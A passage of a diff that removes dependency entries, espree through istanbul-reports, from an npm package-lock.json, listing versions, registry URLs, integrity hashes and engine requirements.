"resolved": "https://registry.npmjs.org/espree/-/espree-9.6.0.tgz", - "integrity": "sha512-1FH/IiruXZ84tpUlm0aCUEwMl2Ho5ilqVh0VvQXw+byAz/4SAciyHLlfmL5WYqsvD38oymdUwBss0LtK8m4s/A==", - "dev": true, - "peer": true, - "dependencies": { - "acorn": "^8.9.0", - "acorn-jsx": "^5.3.2", - "eslint-visitor-keys": "^3.4.1" - }, - "engines": { - "node": "^12.22.0 || ^14.17.0 || >=16.0.0" - }, - "funding": { - "url": "https://opencollective.com/eslint" - } - }, - "node_modules/esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true, - "bin": { - "esparse": "bin/esparse.js", - "esvalidate": "bin/esvalidate.js" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/esquery": { - "version": "1.5.0", - "resolved": "https://registry.npmjs.org/esquery/-/esquery-1.5.0.tgz", - "integrity": "sha512-YQLXUplAwJgCydQ78IMJywZCceoqk1oH01OERdSAJc/7U2AylwjhSCLDEtqwg811idIS/9fIU5GjG73IgjKMVg==", - "dev": true, - "peer": true, - "dependencies": { - "estraverse": "^5.1.0" - }, - "engines": { - "node": ">=0.10" - } - }, - "node_modules/esrecurse": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/esrecurse/-/esrecurse-4.3.0.tgz", - "integrity": "sha512-KmfKL3b6G+RXvP8N1vr3Tq1kL/oCFgn2NYXEtqP8/L3pKapUA4G8cFVaoF3SU323CD4XypR/ffioHmkti6/Tag==", - "dev": true, - "peer": true, - "dependencies": { - "estraverse": "^5.2.0" - }, - "engines": { - "node": ">=4.0" - } - }, - "node_modules/estraverse": { - "version": "5.3.0", - "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-5.3.0.tgz", - "integrity": "sha512-MMdARuVEQziNTeJD8DgMqmhwR11BRQ/cBP+pLtYdSTnf3MIO8fFeiINEbX36ZdNlfU/7A9f3gUw49B3oQsvwBA==", - "dev": true, - "peer": true, - "engines": { - "node": ">=4.0" - } - }, - "node_modules/esutils": { - "version": "2.0.3", - "resolved": "https://registry.npmjs.org/esutils/-/esutils-2.0.3.tgz", - "integrity": "sha512-kVscqXk4OCp68SZ0dkgEKVi6/8ij300KBWTJq32P/dYeWTSwK41WyTxalN1eRmA5Z9UU/LX9D7FWSmV9SAYx6g==", - "dev": true, - "peer": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "dependencies": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sindresorhus/execa?sponsor=1" - } - }, - "node_modules/exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-2Zks0hf1VLFYI1kbh0I5jP3KHHyCHpkfyHBzsSXRFgl/Bg9mWYfMW8oD+PdMPlEwy5HNsR9JutYy6pMeOh61nw==", - "dev": true, - "dependencies": { - "@jest/expect-utils": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" - }, - "node_modules/extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==", - "engines": [ - "node >=0.6.0" - ] - }, - "node_modules/fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" - }, - "node_modules/fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" - }, - "node_modules/fast-levenshtein": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/fast-levenshtein/-/fast-levenshtein-2.0.6.tgz", - "integrity": "sha512-DCXu6Ifhqcks7TZKY3Hxp3y6qphY5SJZmrWMDrKcERSOXWQdMhU9Ig/PYrzyw/ul9jOIyh0N4M0tbC5hodg8dw==", - "dev": true, - "peer": true - }, - "node_modules/fastq": { - "version": "1.15.0", - "resolved": "https://registry.npmjs.org/fastq/-/fastq-1.15.0.tgz", - "integrity": "sha512-wBrocU2LCXXa+lWBt8RoIRD89Fi8OdABODa/kEnyeyjS5aZO5/GNvI5sEINADqP/h8M29UHTHUb53sUu5Ihqdw==", - "dev": true, - "peer": true, - "dependencies": { - "reusify": "^1.0.4" - } - }, - "node_modules/fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "dependencies": { - "bser": "2.1.1" - } - }, - "node_modules/file-entry-cache": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/file-entry-cache/-/file-entry-cache-6.0.1.tgz", - "integrity": "sha512-7Gps/XWymbLk2QLYK4NzpMOrYjMhdIxXuIvy2QBsLE6ljuodKvdkWs/cpyJJ3CVIVpH0Oi1Hvg1ovbMzLdFBBg==", - "dev": true, - "peer": true, - "dependencies": { - "flat-cache": "^3.0.4" - }, - "engines": { - "node": "^10.12.0 || >=12.0.0" - } - }, - "node_modules/fill-range": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", - "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", - "dev": true, - "dependencies": { - "to-regex-range": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/find-up": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-5.0.0.tgz", - "integrity": "sha512-78/PXT1wlLLDgTzDs7sjq9hzz0vXD+zn+7wypEe4fXQxCmdmqfGsEPQxmiCSQI3ajFV91bVSsvNtrJRiW6nGng==", - "dev": true, - "peer": true, - "dependencies": { - "locate-path": "^6.0.0", - "path-exists": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/flat-cache": { - "version": "3.0.4", - "resolved": "https://registry.npmjs.org/flat-cache/-/flat-cache-3.0.4.tgz", - "integrity": "sha512-dm9s5Pw7Jc0GvMYbshN6zchCA9RgQlzzEZX3vylR9IqFfS8XciblUXOKfW6SiuJ0e13eDYZoZV5wdrev7P3Nwg==", - "dev": true, - "peer": true, - "dependencies": { - "flatted": "^3.1.0", - "rimraf": "^3.0.2" - }, - "engines": { - "node": "^10.12.0 || >=12.0.0" - } - }, - "node_modules/flatted": { - "version": "3.2.7", - "resolved": "https://registry.npmjs.org/flatted/-/flatted-3.2.7.tgz", - "integrity": "sha512-5nqDSxl8nn5BSNxyR3n4I6eDmbolI6WT+QqR547RwxQapgjQBmtktdP+HTBb/a/zLsbzERTONyUB5pefh5TtjQ==", - "dev": true, - "peer": true - }, - "node_modules/foreground-child": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-3.3.0.tgz", - "integrity": "sha512-Ld2g8rrAyMYFXBhEqMz8ZAHBi4J4uS1i/CxGMDnjyFWddMXLVcDp051DZfu+t7+ab7Wv6SMqpWmyFIj5UbfFvg==", - "dependencies": { - "cross-spawn": "^7.0.0", - "signal-exit": "^4.0.1" - }, - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/foreground-child/node_modules/signal-exit": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", - "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==", - "engines": { - "node": "*" - } - }, - "node_modules/fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "node_modules/fsevents": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz", - "integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==", - "dev": true, - "hasInstallScript": true, - "optional": true, - "os": [ - "darwin" - ], - "engines": { - "node": "^8.16.0 || ^10.6.0 || >=11.0.0" - } - }, - "node_modules/function-bind": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", - "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", - "dev": true, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true, - "engines": { - "node": "6.* || 8.* || >= 10.*" - } - }, - "node_modules/get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true, - "engines": { - "node": ">=8.0.0" - } - }, - "node_modules/get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", - "dependencies": { - "assert-plus": "^1.0.0" - } - }, - "node_modules/glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "dependencies": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - }, - "engines": { - "node": "*" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/glob-parent": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/glob-parent/-/glob-parent-6.0.2.tgz", - "integrity": "sha512-XxwI8EOhVQgWp6iDL+3b0r86f4d6AX6zSU55HfB4ydCEuXLXc5FcYeOu+nnGftS4TEju/11rt4KJPTMgbfmv4A==", - "dev": true, - "peer": true, - "dependencies": { - "is-glob": "^4.0.3" - }, - "engines": { - "node": ">=10.13.0" - } - }, - "node_modules/globals": { - "version": "13.20.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-13.20.0.tgz", - "integrity": "sha512-Qg5QtVkCy/kv3FUSlu4ukeZDVf9ee0iXLAUYX13gbR17bnejFTzr4iS9bY7kwCf1NztRNm1t91fjOiyx4CSwPQ==", - "dev": true, - "peer": true, - "dependencies": { - "type-fest": "^0.20.2" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/graceful-fs": { - "version": "4.2.11", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", - "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", - "dev": true - }, - "node_modules/graphemer": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/graphemer/-/graphemer-1.4.0.tgz", - "integrity": "sha512-EtKwoO6kxCL9WO5xipiHTZlSzBm7WLT627TqC/uVRd0HKmq8NXyebnNYxDoBi7wt8eTWrUrKXCOVaFq9x1kgag==", - "dev": true, - "peer": true - }, - "node_modules/har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==", - "engines": { - "node": ">=4" - } - }, - "node_modules/har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "deprecated": "this library is no longer supported", - "dependencies": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/hasown": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", - "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", - "dev": true, - "dependencies": { - "function-bind": "^1.1.2" - }, - "engines": { - "node": ">= 0.4" - } - }, - "node_modules/html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "node_modules/http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", - "dependencies": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" - }, - "engines": { - "node": ">=0.8", - "npm": ">=1.3.7" - } - }, - "node_modules/human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true, - "engines": { - "node": ">=10.17.0" - } - }, - "node_modules/ignore": { - "version": "5.2.4", - "resolved": "https://registry.npmjs.org/ignore/-/ignore-5.2.4.tgz", - "integrity": "sha512-MAb38BcSbH0eHNBxn7ql2NH/kX33OkB3lZ1BNdh7ENeRChHTYsTvWrMubiIAMNS2llXEEgZ1MUOBtXChP3kaFQ==", - "dev": true, - "peer": true, - "engines": { - "node": ">= 4" - } - }, - "node_modules/import-fresh": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/import-fresh/-/import-fresh-3.3.0.tgz", - "integrity": "sha512-veYYhQa+D1QBKznvhUHxb8faxlrwUnxseDAbAp457E0wLNio2bOSKnjYDhMj+YiAq61xrMGhQk9iXVk5FzgQMw==", - "dev": true, - "dependencies": { - "parent-module": "^1.0.0", - "resolve-from": "^4.0.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/import-local": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.2.0.tgz", - "integrity": "sha512-2SPlun1JUPWoM6t3F0dw0FkCF/jWY8kttcY4f599GLTSjh2OCuuhdTkJQsEcZzBqbXZGKMK2OqW1oZsjtf/gQA==", - "dev": true, - "dependencies": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - }, - "bin": { - "import-local-fixture": "fixtures/cli.js" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true, - "engines": { - "node": ">=0.8.19" - } - }, - "node_modules/inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "dependencies": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "node_modules/inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "node_modules/is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "node_modules/is-core-module": { - "version": "2.15.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.15.1.tgz", - "integrity": "sha512-z0vtXSwucUJtANQWldhbtbt7BnL0vxiFjIdDLAatwhDYty2bad6s+rijD6Ri4YuYJubLzIJLUidCh09e1djEVQ==", - "dev": true, - "dependencies": { - "hasown": "^2.0.2" - }, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/is-extglob": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/is-extglob/-/is-extglob-2.1.1.tgz", - "integrity": "sha512-SbKbANkN603Vi4jEZv49LeVJMn4yGwsbzZworEoyEiutsN3nJYdbO36zfhGJ6QEDpOZIFkDtnq5JRxmvl3jsoQ==", - "dev": true, - "peer": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "engines": { - "node": ">=8" - } - }, - "node_modules/is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/is-glob": { - "version": "4.0.3", - "resolved": "https://registry.npmjs.org/is-glob/-/is-glob-4.0.3.tgz", - "integrity": "sha512-xelSayHH36ZgE7ZWhli7pW34hNbNl8Ojv5KVmkJD4hBdD3th8Tfk9vYasLM+mXWOZhFkgZfxhLSnrwRr4elSSg==", - "dev": true, - "peer": true, - "dependencies": { - "is-extglob": "^2.1.1" - }, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true, - "engines": { - "node": ">=0.12.0" - } - }, - "node_modules/is-obj": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/is-obj/-/is-obj-2.0.0.tgz", - "integrity": "sha512-drqDG3cbczxxEJRoOXcOjtdp1J/lyp1mNn0xaznRs8+muBhgQcrnbspox5X5fOw0HnMnbfDzvnEMEtqDEJEo8w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/is-path-inside": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/is-path-inside/-/is-path-inside-3.0.3.tgz", - "integrity": "sha512-Fd4gABb+ycGAmKou8eMftCupSir5lRxqf4aD/vd0cD2qc4HL07OjCeuHMr8Ro4CoMaeCKDB0/ECBOVWjTwUvPQ==", - "dev": true, - "peer": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" - }, - "node_modules/isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==" - }, - "node_modules/isomorphic-ws": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", - "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", - "peerDependencies": { - "ws": "*" - } - }, - "node_modules/isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" - }, - "node_modules/istanbul-lib-coverage": { - "version": "3.2.2", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.2.tgz", - "integrity": "sha512-O8dpsF+r0WV/8MNRKfnmrtCWhuKjxrq2w+jpzBL5UZKTi2LeVWnWOmWRxFlesJONmc+wLAGvKQZEOanko0LFTg==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-instrument": { - "version": "6.0.3", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-6.0.3.tgz", - "integrity": "sha512-Vtgk7L/R2JHyyGW07spoFlB8/lpjiOLTjMdms6AFMraYt3BaJauod/NGrfnVG/y4Ix1JEuMRPDPEj2ua+zz1/Q==", - "dev": true, - "dependencies": { - "@babel/core": "^7.23.9", - "@babel/parser": "^7.23.9", - "@istanbuljs/schema": "^0.1.3", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^7.5.4" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-lib-instrument/node_modules/semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-lib-report": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.1.tgz", - "integrity": "sha512-GCfE1mtsHGOELCU8e/Z7YWzpmybrx/+dSTfLrvY8qRmaY6zXTKWn6WQIjaAFw069icm6GVMNkgu0NzI4iPZUNw==", - "dev": true, - "dependencies": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^4.0.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "dependencies": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-reports": { - "version": "3.1.7", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.7.tgz", - "integrity": "sha512-BewmUXImeuRk2YY0PVbxgKAysvhRPUQE0h5QRM++nVWyubKGV0l8qQ5op8+B2DOmwSe63Jivj0BjkPQVf8fP5g==", - "dev": true, - "dependencies": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - 